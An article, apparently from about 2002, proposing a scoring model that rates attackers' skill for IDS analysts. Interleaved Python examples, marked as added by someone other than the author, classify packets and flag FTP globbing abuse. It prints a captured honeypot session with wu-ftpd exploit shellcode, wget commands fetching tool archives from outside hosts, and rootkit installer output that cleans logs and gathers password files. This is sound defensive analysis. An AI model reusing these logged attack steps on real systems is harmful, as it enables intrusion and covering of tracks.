Rating the Enemy: "How to identify the enemy"

Author: Toby Miller

Purpose

This paper presents a preliminary version of a model for rating the attackers, as well as a justification for doing so and techniques for using the information. There is still more work to be done, and I would appreciate your feedback and constructive suggestions.

This model is designed for IDS analysts and security engineers to use in order to help evaluate attacks, provide better information to upper management and assist in assessing the threat level to your network. If you have any recommendations, please contact me at tmiller@va.prestige.net.

The Logic

One of the problems I see in the Intrusion Detection | Honeypot world is the lack of a model that we can use to accurately rank or rate our cyber-threats. Granted, if you use ISS or any other commercial IDS, your alerts may be different colors based on the attack being used against you. The only problem with that system is that the IDS has no clue about your network infrastructure. Therefore in some cases the alert may not be totally accurate.

This paper provides a generic framework for a model based on your own infrastructure. It also describes the categories used in doing the analysis.

The Model

The model uses five categories, each having a calculated score that helps the analyst determine the threat level. The categories are:

  • Operating system and user expertise
  • Recon/intelligence gathering
  • Type of attack
  • Tools used
  • Destination IP

The Operating System

The operating system category rates the operating systems and the skill level associated with each operating system. The skill level associated with each operating system is important. Why? Most people will only use operating systems with which they are familiar. As a general rule, most people who are inexperienced within the computer world use Windows. Usually, a more experienced or advanced computer user will use Linux or some form of Unix. The operating systems discussed in this paper are rated based on the attacker’s operating system (using passive OS fingerprinting) and the destination operating system (using your own knowledge of the network). The model currently uses eleven operating systems:

  • Windows 95|98|ME
  • Windows NT
  • Windows 2000| XP
  • Linux 2.2
  • Linux 2.4
  • OpenBSD
  • NetBSD
  • FreeBSD
  • Solaris 8
  • Solaris 2.5 thru 2.7
  • MAC OS X

For a complete chart of the operating systems please refer to the matrix at the end of this article. If you look at the chart you will see we use a five point scoring system in this and other categories. This provides us with a baseline on how we rank the skill level. The five-point scoring is based on the following criteria:

  • 1 = Script Kiddie. This person is not very skilled or knowledgeable in the computer world.
  • 2 = Basic User. This person has some knowledge of computers, but still relies on others for his | her attack.
  • 3 = Power User. Still learning. Understands computers, probably enough by now to be considered dangerous.
  • 4 = System Administrator. Knowledgeable in many areas. Understands TCP/IP and some programming languages.
  • 5 = Professional. Knows the computer inside and out. Understands TCP/IP, excellent programmer. Does not rely on others for exploits or attacks.

For example, if the attacker is using an OpenBSD machine and is attacking an OpenBSD machine, then in this category he would receive a score of 5 points out of 5, whereas an attacker who uses a Windows 98 machine to attack a Windows 98 machine would receive a score of 1.

Recon | Intelligence Gathering

I think as security experts we can appreciate good recon. But as security experts we also understand that there are some not-so-good methods for performing recon. In this model we take that into consideration as well. How do we do this? Well, this category is similar to the first category in the way information is rated. I developed a chart that uses two areas in order to assign a grade. The first area is the type of recon. This has eleven different options that we grade. The second area is the attacker's operating system.

Why do we include the attacker's operating system? It is most likely that an attacker who uses a BSD type of machine for the attack will use more sophisticated techniques than a person who uses a Windows machine. Therefore, the operating system helps us narrow down the skill level of the attacker. The following is the list of recon methods I am using:

  • SYN packet with a packet size less than or equal to 40 bytes (using no options).
  • SYN packet with a packet size greater than 40 bytes (using options).
  • FIN scan
  • Xmas tree scan
  • SYN | FIN scan
  • TCP connect
  • RST scan
  • UDP probe
  • ICMP

Ok, now that we know what types of recon this model uses, let's look at why some are rated higher than others (not all scans will have a write-up).

First, we have a SYN packet that is equal to or less than 40 bytes. This type of packet should not be seen on a network. Without going into too much detail, keep in mind that every SYN packet should have at least one TCP option set. That option is the maximum segment size, which is 4 bytes in length, and that makes our minimum packet size 44 bytes. With all of that being said, I think that attackers who use programs that send 40-byte packets are not as skilled as some others. Being stealthy means that a person can fly under the radar and not be detected. 40-byte packets stand out like a sore thumb.

The next form of intelligence gathering we will look at is the SYN packet with a packet size greater than 40 bytes. To me this is more stealthy than the 40-byte packet. Why? Well, these packets look normal compared to the 40-byte packets. If I see a 60-byte SYN packet on the network, I will consider that packet normal a lot quicker than I will a 40-byte packet. Enough said (I hope).

I just want to touch on one more topic here: Packets with strange flags set. I do not find these packets stealthy. Why? Well, in today’s world many Firewalls and Intrusion Detection Systems can spot these puppies in no time. Any decent IDS analyst should be raising flags if they see packets like this. Strange flags set in packets are not stealthy and really do not reflect any skill in my opinion.

This category allows for 5 points maximum.
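To make the recon categories above concrete, here is an added example (my code, not the author's) that decodes a raw IPv4/TCP packet and maps it to one of the recon columns of the model, using the 40-byte rule from the text. It embeds the article's own first SYN with the masked attacker address replaced by 192.0.2.1, and builds constructed probe packets with zeroed checksums for the other cases.

```python
"""Classify one captured probe into the recon-matrix columns of the rating model.
Added example, not the author's code; sample packets below are constructed."""
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
NON_TCP = {1: "ICMP", 17: "UDP"}
EXACT_FLAGS = {SYN | FIN: "SYN|FIN", FIN | PSH | URG: "Xmas", FIN: "FIN", RST: "RST"}

# The article's first SYN (60 bytes; mss, sackOK, timestamp, nop, wscale options)
# with its masked source address replaced by 192.0.2.1 (TEST-NET-1).
ARTICLE_SYN = bytes.fromhex(
    "4500003c4cd840002806d5cc" "c0000201" "0a0a0a28"
    "83df0015c566214000000000a00216d028d60000"
    "020405b40402080a00166d980000000001030300")

def make_tcp_probe(flags, options=b""):
    """Constructed IPv4/TCP packet 192.0.2.1:1024 -> 10.10.10.40:21, checksums left zero."""
    opts = options + b"\x00" * (-len(options) % 4)       # options are padded to 32 bits
    doff = 5 + len(opts) // 4
    tcp = struct.pack("!HHIIBBHHH", 1024, 21, 1, 0, doff << 4, flags, 5840, 0, 0) + opts
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0,
                     bytes([192, 0, 2, 1]), bytes([10, 10, 10, 40]))
    return ip + tcp

def parse_ipv4(pkt):
    """Minimal IPv4 header decode: total length, protocol, addresses and payload."""
    ihl, total_len = (pkt[0] & 0x0F) * 4, struct.unpack("!H", pkt[2:4])[0]
    return {"len": total_len, "proto": pkt[9],
            "src": ".".join(map(str, pkt[12:16])), "dst": ".".join(map(str, pkt[16:20])),
            "payload": pkt[ihl:total_len]}

def tcp_option_kinds(options):
    """Walk the TCP option list and return the option kinds present (2 = MSS, 3 = wscale, ...)."""
    kinds, i = [], 0
    while i < len(options) and options[i] != 0:          # kind 0 ends the list
        kind = options[i]
        if kind == 1:                                     # NOP carries no length byte
            kinds.append(kind)
            i += 1
            continue
        if i + 1 >= len(options) or options[i + 1] < 2:   # truncated or malformed length
            break
        kinds.append(kind)
        i += options[i + 1]
    return kinds

def classify_probe(pkt):
    """Map a single packet to a recon column; TCP connect needs the whole handshake."""
    ip = parse_ipv4(pkt)
    if ip["proto"] != 6:
        return NON_TCP.get(ip["proto"], "Other")
    tcp = ip["payload"]
    doff, flags = (tcp[12] >> 4) * 4, tcp[13] & 0x3F
    if flags in EXACT_FLAGS:
        return EXACT_FLAGS[flags]
    if flags == SYN:
        # MSS alone makes a SYN 44 bytes, so a 40-byte option-less SYN marks a crafted packet.
        if ip["len"] <= 40 and not tcp_option_kinds(tcp[20:doff]):
            return "SYN <= 40"
        return "SYN > 40"
    return "Other"
```

The returned label is the column to look up in the recon matrix at the end of the article for the attacker's fingerprinted OS.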

The Attack

This category is one of the most important categories of them all. This is where you really get a good feeling about the skill level of your attacker. Here is how we score this category:

  • Was the attack applicable to the operating system? Yes = 1 No = 0
  • Has this type of attack been reported before? Yes = 0 No = 1
  • Is this a new attack? Yes = 2 No = 0
  • Is this a known attack that has been modified? Yes = 1 No = 0
  • Is this a common attack? Yes = 0 No = 1
  • Was the attack successful? Yes = 1 No = 0

The attack category is where your attack signature skills come in handy. Let's take a look at the first item. As obvious as this seems, it is a legitimate question. How many times have you seen a Linux attack being used against a Windows NT machine? If the attack is applicable, then the attacker receives a point. Has the attack been reported before? If you have seen many of these types of attacks described on DShield, SecurityFocus or other lists, you can assume that your attacker has gotten herself a script and is trying to follow the leader. Therefore she receives no points. If the attack is new and you have never seen anything like it, then you probably need to look a little closer. The attacker gets two (2) points for the new attack.

If the attack is known, but the signature had been modified so that an IDS might not pick it up, your attacker probably has some expertise. Give her a point!

The next one, about whether it's a common attack, is similar to the question about whether it has been reported before. If you can look at the attack and say "That was created by t666.c", then your attacker gets a 0.

Finally, if the attack was successful, either your attacker took a lucky guess or he was somewhat skillful; either way, he gets a point.

This category allows for a maximum point total of 6 points.

Tools Used

This category is used to gauge the tools the attacker used to cover his tracks once the machine has been compromised. It is based on two types of tools: rootkits and worms. The following list shows the tools and the score associated with their use.

  • Rootkits
    • Binary based rootkit Score: 1
    • LKM rootkit Score: 3
    • Advanced LKM based rootkit: Score: 5
    • Windows based rootkit Score: 3
  • Worms
    • Was it a self-propagated worm? Score: 2
    • Does it exploit multiple services or exploits? Score: 3
    • Is it polymorphic? Score: 5
    • Does the worm cross OS platforms? Score: 5

The maximum points one can receive from this category is 15. I really think this category is self-explanatory. If there is anything I have left out please let me know.

Destination IP

This category gives us an idea of how the destination IP was being used. Let's take a look at the point system for this category:

  • Was the destination machine up? Yes = 1 No = 0
  • Latest patches applied? Yes = 2 No = 0
  • Computer on broadband, no personal or critical data Score: 4
  • Personal information located on the attacked server
    • SSN numbers Score: 5
    • Credit card numbers Score: 5
    • Bank account numbers Score: 5
    • Financial numbers and information Score: 5
  • Critical information located on the attacked server
    • Data of national interest Score: 5
    • Data of company interest Score: 5
    • Network related information Score: 4

This category can total up to 23 points maximum. Why is this important? Well, you really need to understand the importance of the destination IP and what is on the machine in order to truly evaluate an attacker and his intentions. For example, if an attacker is attacking a machine that has absolutely nothing on it and is only connected to the internet by a modem then I would not consider this attacker as much of a threat as a hacker who is trying to attack my HR server with personal information on it and is connected to the internet 24/7. If you have any recommendations, please contact me.

The Final Score

This section calculates the score and begins to rate the skill level of the attacker. The following is the points total:

  • 1-12 = Script Kiddie
  • 12-22 = Basic User
  • 22-32 = Power User
  • 33-43 = Sys-Admin
  • 44-54 = Advanced Hacker

Real Life Example

Ok, models are not worth a penny unless we can see how they can be used in the real world. With that being said, I recently had one of my honeypots hacked, and I used this model to rate the attacker.

Let's take a look at the attack and see if we can rate the attacker. Here's some background: First, I had a RedHat Linux 7.2 honeypot set up with the following ports open:

21: Ftp
22: SSH
25: Sendmail
111: Rpc
143: Imap

The attack happened on Jun 7, 2002 at 00:37 in the morning. I had enabled wu-ftpd because RedHat 7.2 installs a vulnerable version of it. For those who may have forgotten, there is a globbing vulnerability in wu-ftpd 2.5.0, 2.6.0 and 2.6.1. It was released last November, and exploiting it was not all that hard to do. All one needed to do was find an anonymous ftp server and run the exploit. Let's take a look at what the attacker did:

1) The attacker makes his connection:

00:37:17.464082 xxx.xxx.xxx.xxx.33759 > 10.10.10.40.ftp: S [tcp sum ok] 
     3311804736:3311804736(0) 
     win 5840 <mss 1460,sackOK,timestamp 1469848 0,nop,wscale 0> (DF) 
     (ttl 40, id 19672, len 60)
0x0000	 4500 003c 4cd8 4000 2806 d5cc xxxx xxxx	E..<L.@.(.......
0x0010	 0a0a 0a28 83df 0015 c566 2140 0000 0000	...(.....f!@....
0x0020	 a002 16d0 28d6 0000 0204 05b4 0402 080a	....(...........
0x0030	 0016 6d98 0000 0000 0103 0300          	..m.........

00:37:17.464082 10.10.10.40.ftp > xxx.xxx.xxx.xxx.33759: S [tcp sum ok] 
     4193914002:4193914002(0) ack 3311804737 win 5792 
     <mss 1460,sackOK,timestamp 39380333 1469848,nop,wscale 0> (DF) 
     (ttl 64, id 0, len 60)
0x0000	 4500 003c 0000 4000 4006 0aa5 0a0a 0a28	E..<..@.@......(
0x0010	 xxxx xxxx 0015 83df f9fa 0c92 c566 2141	.............f!A
0x0020	 a012 16a0 3aa2 0000 0204 05b4 0402 080a	....:...........
0x0030	 0258 e56d 0016 6d98 0103 0300          	.X.m..m.....

00:37:17.634082 xxx.xxx.xxx.xxx.33759 > 10.10.10.40.ftp: . 
     [tcp sum ok] 1:1(0) ack 1 win 5840 
     <nop,nop,timestamp 1469866 39380333> (DF) 
     (ttl 40, id 19673, len 52)
0x0000	 4500 0034 4cd9 4000 2806 d5d3 xxxx xxxx	E..4L.@.(.......
0x0010	 0a0a 0a28 83df 0015 c566 2141 f9fa 0c93	...(.....f!A....
0x0020	 8010 16d0 6925 0000 0101 080a 0016 6daa	....i%........m.
0x0030	 0258 e56d                              	.X.m

2) The attacker logs in (using Ethereal):

220 alligator12 FTP server (Version wu-2.6.1-18) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.

3) Attacker begins trying to rename:

RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name

4) Attacker begins to glob:

CWD 0000000000000000000000000000(cut for publication)
CWD ~/{.,.,.,.}
250 CWD command successful.
CWD .
250 CWD command successful.
RNFR ././././././././.
350 File exists, ready for destination name
CWD 735073
550 735073: No such file or directory.
CWD 73507
550 73507: No such file or directory.
CWD 7350é
550 7350é: No such file or directory.
RNFR .
350 File exists, ready for destination name
RNFR ./././././././.
350 File exists, ready for destination name

5) Attacker gets what he wants:

CWD ~{
sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±h/Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€áÍ€unset HISTFILE;id;uname -a;
uid=0(root) gid=0(root) groups=50(ftp)

6) Attacker runs script to download tools:

echo 1 ; if [ -f /usr/bin/wget ] ; then /usr/bin/wget http://diablows.org/gold.tgz ; 
  else if [ -f /usr/bin/lynx ] ; 
  then /usr/bin/lynx -dump http://diablows.org/gold.tgz >> gold.tgz ; fi ; fi ; fi
Linux alligator12 2.4.7-10 #1 Thu Sep 6 17:21:28 EDT 2001 i586 unknown
echo 1 ; if [ -f /usr/bin/wget ] ; then /usr/bin/wget http://diablows.org/gold.tgz ; 
  else if [ -f /usr/bin/lynx ] ; 
  then /usr/bin/lynx -dump http://diablows.org/gold.tgz >> gold.tgz ; fi ; fi ; fi

7) Attacker installs rootkit:

CWD ~{
sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±h/Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€áÍ€unset HISTFILE;id;uname -a;
uid=0(root) gid=0(root) groups=50(ftp)
Linux alligator12 2.4.7-10 #1 Thu Sep 6 17:21:28 EDT 2001 i586 unknown
mkdir /usr/.snmp
cd /usr/.snmp
wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
wget arhive.muhahack.com/admin/xxx.tar.gz
ls -al
total 236
drwxr-xr-x    2 root     root         4096 Jun  7 01:13 .
drwxr-xr-x   17 root     root         4096 Jun  7 01:12 ..
-rw-r--r--    1 root     root       226810 May  9 02:41 xxx.tar.gz
tar xvfz xxx.tar.gz
soulsad/
soulsad/bj
soulsad/cleaner
soulsad/crypt
soulsad/etc/
soulsad/etc/ssh_host_key.pub
soulsad/etc/ssh_random_seed
soulsad/etc/ssh_host_key
soulsad/etc/sshd_config
soulsad/instmod
soulsad/lsn
soulsad/pg
soulsad/rcp
soulsad/rpass
soulsad/setup
soulsad/sshd
soulsad/sz
soulsad/td
soulsad/utime
soulsad/wget
soulsad/x.conf
rm -rf xxx.tar.gz
cd soulsad
./setup Marianne
0;36mRedHat Linux Rootkit mv0.6 Recompiled By Trixx_ro - \ 
  You dont have the right to judge me!
********************************************************************************** \
  We are now preparing the server***********************************
Installing from /usr/.snmp/soulsad - You have to erase /usr/.snmp/soulsad after install
Checking for existing rootkits..
Installing on RedHat Linux V 7.2 with i586 CPU
***Using Password*****
File processed...
Creating Backups...su ping du passwd find netstat lsof***************************
*************************Instaling Trojans********************************
************************************************************************
ERROR: ./login Does not exist
************************************************************************ Instaling sshd
Instaling Telnetd Server 
ERROR: ./telnetd Does not exist
Mtelnetd
./su Does not exist
 suERROR: ./ping Does not exist
 pingERROR: ./du Does not exist
 duERROR: ./passwd Does not exist
 passwdERROR: ./find Does not exist
 findERROR: ./netstat Does not exist
 netstatERROR: ./lsof Does not exist
 lsofERROR: ./in.ftpd Does not exist
 in.ftpdERROR: ./named Does not exist
 namedStopping named: [FAILED]
Starting named: [  OK  ]
ERROR: ./ps Does not exist
Copying extra tools to RKdir 
************************************************************************ \
  cleaner sz rcp pg crypt utime wget instmod secure.sh checkrk socklist
Unpacking and copying some files 
Done.
Installing Sniffer …Done.
Killing some unusefull services ...
Trying to patch some shits ...
Done with the procedure of hacking ...
Continue ...
Cleaning the logs
Log cleaner  By: Tragedy/Dor
OS detection....
Detected Linux
---<[ Log cleaning in process....
Cleaning mboot.log 
Cleaning cron 
Cleaning dmesg 
Cleaning htmlaccess.log 
Cleaning ksyms
Cleaning maillog 
Cleaning messages 
Cleaning mysqld.log 
Cleaning netconf.log 
Cleaning rpmpkgs 
Cleaning secure 
Cleaning xferlog 
Linux detected... rehashing syslog
Getting desired information ...
Geting the uname -a ...
Geting the ifconfig -a ...
Geting the uptime info...
Geting the cpuinfo ...
Geting the passwd file ...
Geting the shadow passwd file ...
Geting the hard disk free ...
Geting the CPU memory ...
Sending yahoo pings ...
Done!
 Rootkit installation Completed in 4 Seconds.
Password: Marianne
SSH port:3012:Password:Marianne
alligator12 - Linux 2.4.7-10 - CPU: i586
Forgive me Father ... for i have sinned.
******************************************************************* \ 
  DON'T FORGET TO DELETE RKDIR: rm -rf /illogic* 
BEFORE YOU LOGOUT!
cd ..
rm -rf *
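The session above is what the analyst actually has to work from, so here is an added detection example (my code, not the author's) that scans an FTP control-channel transcript for the indicators visible in steps 3 to 5: long runs of RNFR with no RNTO, CWD arguments containing shell-glob characters such as "~{", and non-printable bytes in a path argument. The sample transcript is constructed in the shape of the article's session, and the RNFR threshold is my own tuning assumption.

```python
"""Flag wu-ftpd globbing abuse in an FTP control-channel transcript. Added example,
not the author's code; the sample below is constructed in the shape of the article's session."""
import re

SAMPLE_SESSION = """\
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
CWD ~/{.,.,.,.}
250 CWD command successful.
CWD 7350é
550 7350é: No such file or directory.
CWD ~{
"""

SERVER_REPLY = re.compile(r"^\d{3}[ -]")        # "220 ...", "350 ...": not client input
GLOB_CHARS = re.compile(r"[{}~*?\[\]]")         # shell-glob metacharacters in a path
RNFR_STREAK_THRESHOLD = 5                        # assumption: a tuning knob, not from the article

def ftp_session_indicators(transcript):
    """Return globbing/overflow indicators found in the client commands of one session."""
    streak = max_streak = 0
    glob_cwd, odd_args = [], []
    for n, line in enumerate(transcript.splitlines(), 1):
        if SERVER_REPLY.match(line):
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        streak = streak + 1 if cmd == "RNFR" else 0      # consecutive RNFR, never completed by RNTO
        max_streak = max(max_streak, streak)
        if cmd == "CWD" and GLOB_CHARS.search(arg):
            glob_cwd.append((n, arg))
        if cmd in ("CWD", "RNFR") and any(not 32 <= ord(c) < 127 for c in arg):
            odd_args.append((n, cmd))                    # non-printable bytes in a path
    return {"max_rnfr_streak": max_streak, "glob_cwd": glob_cwd, "odd_args": odd_args}

def is_suspicious(transcript):
    ind = ftp_session_indicators(transcript)
    return (ind["max_rnfr_streak"] >= RNFR_STREAK_THRESHOLD
            or bool(ind["glob_cwd"]) or bool(ind["odd_args"]))
```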

Rating the attack

Based on the scoring system, the attacker appears to be a script kiddie:

  • Operating System Score: Linux to Linux = 3
  • Recon Intel Score: 0 (attacker did no apparent recon)
  • The Attack = 2
  • Tools used = 1. For the record, the attacker never bothered to check whether the rootkit's binaries installed. Between us… they did not.
  • Destination IP: 5
  • Final Score: 11 = Script Kiddie
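The five categories, the score bands and the rating of this incident, as an added example in code (mine, not the author's). The matrix values are transcribed from the two tables at the end of the article; the yes/no answers for the attack and destination categories are my reading of the narrative above, chosen to reproduce the author's 2 and 5 points, and the band mapping sends a score on a shared boundary (12, 22) to the lower band.

```python
"""Five-category attacker rating model from the article as code. Added example, not
the author's own implementation; all matrix values are transcribed from the article."""

OS_NAMES = ["Win 95|98|ME", "Win NT", "Win 2000|XP", "Linux 2.2", "Linux 2.4",
            "OpenBSD", "NetBSD", "FreeBSD", "Solaris 8", "Solaris 2.5-2.7", "MAC OS X"]
# Operating System Matrix: row = attacker OS, column = victim OS, both in OS_NAMES order.
OS_MATRIX = [
    [1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2], [2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
    [2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3], [2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4],
    [2, 4, 4, 4, 3, 4, 4, 4, 4, 4, 4], [5, 5, 5, 5, 4, 5, 5, 5, 5, 5, 5],
    [5, 5, 5, 5, 4, 5, 5, 5, 5, 5, 5], [5, 5, 5, 5, 4, 5, 5, 5, 5, 5, 5],
    [4, 4, 4, 4, 4, 5, 4, 4, 4, 4, 4], [4, 4, 4, 4, 4, 5, 4, 4, 4, 4, 4],
    [4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4],
]
RECON_TYPES = ["SYN <= 40", "SYN > 40", "FIN", "Xmas", "SYN|FIN", "TCP connect",
               "RST", "UDP", "ICMP", "Other"]
# Recon matrix: row = attacker OS (OS_NAMES order), column = recon method (RECON_TYPES order).
RECON_MATRIX = [
    [1, 2, 2, 2, 2, 2, 2, 2, 2, 2], [1, 2, 2, 3, 3, 4, 3, 3, 3, 3],
    [1, 3, 3, 3, 3, 4, 4, 3, 3, 3], [1, 4, 4, 3, 3, 4, 3, 4, 4, 3],
    [1, 4, 4, 3, 3, 4, 3, 4, 4, 3], [1, 5, 4, 3, 3, 5, 4, 4, 4, 4],
    [1, 5, 4, 3, 3, 5, 4, 4, 4, 4], [1, 5, 4, 3, 3, 5, 4, 4, 4, 4],
    [1, 4, 4, 3, 3, 5, 4, 4, 4, 4], [1, 4, 4, 4, 4, 5, 4, 4, 4, 4],
    [1, 4, 4, 4, 4, 4, 4, 4, 4, 4],
]
# Tools-used and Destination-IP point values as listed in the article.
TOOL_POINTS = {"binary rootkit": 1, "LKM rootkit": 3, "advanced LKM rootkit": 5,
               "Windows rootkit": 3, "self-propagating worm": 2, "multi-exploit worm": 3,
               "polymorphic worm": 5, "cross-platform worm": 5}
DEST_POINTS = {"machine up": 1, "latest patches": 2, "broadband, no sensitive data": 4,
               "SSN": 5, "credit card": 5, "bank account": 5, "financial": 5,
               "national interest": 5, "company interest": 5, "network information": 4}

def os_score(attacker_os, victim_os):
    return OS_MATRIX[OS_NAMES.index(attacker_os)][OS_NAMES.index(victim_os)]

def recon_score(attacker_os, recon_seen):
    """Score the highest-rated recon method observed; none observed scores 0, as in the article."""
    row = RECON_MATRIX[OS_NAMES.index(attacker_os)]
    return max((row[RECON_TYPES.index(r)] for r in recon_seen), default=0)

def attack_score(applicable, reported, new, modified, common, successful):
    """The six yes/no questions of the Attack category, with the article's point values."""
    return (int(applicable) + int(not reported) + 2 * int(new)
            + int(modified) + int(not common) + int(successful))

def tools_score(tools):
    return sum(TOOL_POINTS[t] for t in tools)

def destination_score(attributes):
    return sum(DEST_POINTS[a] for a in attributes)

def skill_level(total):
    """Map a total to the article's bands; a score on a shared boundary goes to the lower band."""
    for upper, label in ((12, "Script Kiddie"), (22, "Basic User"),
                         (32, "Power User"), (43, "Sys-Admin")):
        if total <= upper:
            return label
    return "Advanced Hacker"

def rate_honeypot_incident():
    """The article's wu-ftpd incident; the yes/no answers are my reading of its narrative."""
    parts = {"os": os_score("Linux 2.4", "Linux 2.4"),                          # 3
             "recon": recon_score("Linux 2.4", []),                             # 0
             "attack": attack_score(applicable=True, reported=True, new=False,
                                    modified=False, common=True, successful=True),  # 2
             "tools": tools_score(["binary rootkit"]),                          # 1
             "destination": destination_score(["machine up", "broadband, no sensitive data"])}  # 5
    total = sum(parts.values())
    return parts, total, skill_level(total)
```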

To Do | Issues

Ok, this is the part of the paper where I request the community’s input on this model. I think I have covered a lot in this model but there is no way I have covered everything. The following items are on my to-do list for continuing work on developing the model:

  • Include timetable in scanning for Recon | Intel gathering. Example, fast scanning vs. slow type of scanning.
  • Watching the attacker on the box itself. Example, if an attacker requires a rootkit to cover his tracks vs. ensuring for himself that he is not being “used”.
  • Refine the point system.
  • Eventually automate the system. I would like to see this used in conjunction with SNORT or something like that.
  • Be able to create a clearer profile of the attacker. The FBI is able to profile murderers and rapists, why can't we profile hackers? There are many different ways to do this. We just need to become familiar with the technologies.
  • Spoofing. What do we do about spoofing? For example, in the real life example I gave the guy 0 points because of no apparent recon. How do we really know that? How can we rate this?

This is a small list of what I think needs to be done with the model. If you have any constructive comments or suggestions please e-mail me at tmiller@va.prestige.net.

Operating System Matrix

Rows are the attacker's OS, columns the victim's OS. Column abbreviations: W9x = Win 95|98|ME, NT = Win NT, W2K = Win 2000|XP, L2.2 = Linux 2.2, L2.4 = Linux 2.4, OBSD = OpenBSD, NBSD = NetBSD, FBSD = FreeBSD, Sol8 = Solaris 8, Sol2 = Solaris 2.5-2.7, OSX = MAC OS X.

Attacker OS          W9x    NT   W2K  L2.2  L2.4  OBSD  NBSD  FBSD  Sol8  Sol2   OSX
Win 95|98|ME           1     2     2     2     2     2     2     2     2     2     2
Win NT                 2     3     3     3     3     3     3     3     3     3     3
Win 2000|XP            2     3     3     3     3     3     3     3     3     3     3
Linux 2.2              2     4     4     4     4     4     4     4     4     4     4
Linux 2.4              2     4     4     4     3     4     4     4     4     4     4
OpenBSD                5     5     5     5     4     5     5     5     5     5     5
NetBSD                 5     5     5     5     4     5     5     5     5     5     5
FreeBSD                5     5     5     5     4     5     5     5     5     5     5
Solaris 8              4     4     4     4     4     5     4     4     4     4     4
Solaris 2.5-2.7        4     4     4     4     4     5     4     4     4     4     4
MAC OS X               4     4     4     4     4     4     4     4     4     4     4

Key:
5 = Advanced hacker. Could be very well skilled. Most people who maintain this operating system are knowledgeable in network administration and various programming languages.
4 = System Administrator. This user is semi-advanced. Not as polished with the admin and programming skills.
3 = Power User. Still learning. Can move around using a shell. Does not need a GUI to get the job done.
2 = Basic User. This person understands the basics. Ask this person to set up anything complicated and you will receive a strange look in return.
1 = Script Kiddie. Need I say more.

Recon Matrix

Rows are the attacker's OS, columns the recon method. Column abbreviations: SYN<=40 = SYN packet of 40 bytes or less (no options), SYN>40 = SYN packet over 40 bytes (options), FIN = FIN scan, Xmas = Xmas tree scan, SYN|FIN = SYN|FIN scan, Conn = TCP connect, RST = RST scan, UDP = UDP probe, ICMP = ICMP, Other = other.

Attacker OS        SYN<=40  SYN>40     FIN    Xmas SYN|FIN    Conn     RST     UDP    ICMP   Other
Win 95|98|ME             1       2       2       2       2       2       2       2       2       2
Win NT                   1       2       2       3       3       4       3       3       3       3
Win 2000|XP              1       3       3       3       3       4       4       3       3       3
Linux 2.2                1       4       4       3       3       4       3       4       4       3
Linux 2.4                1       4       4       3       3       4       3       4       4       3
OpenBSD                  1       5       4       3       3       5       4       4       4       4
NetBSD                   1       5       4       3       3       5       4       4       4       4
FreeBSD                  1       5       4       3       3       5       4       4       4       4
Solaris 8                1       4       4       3       3       5       4       4       4       4
Solaris 2.5-2.7          1       4       4       4       4       5       4       4       4       4
MAC OS X                 1       4       4       4       4       4       4       4       4       4

Key: as for the Operating System Matrix above (5 = Advanced hacker, 4 = System Administrator, 3 = Power User, 2 = Basic User, 1 = Script Kiddie).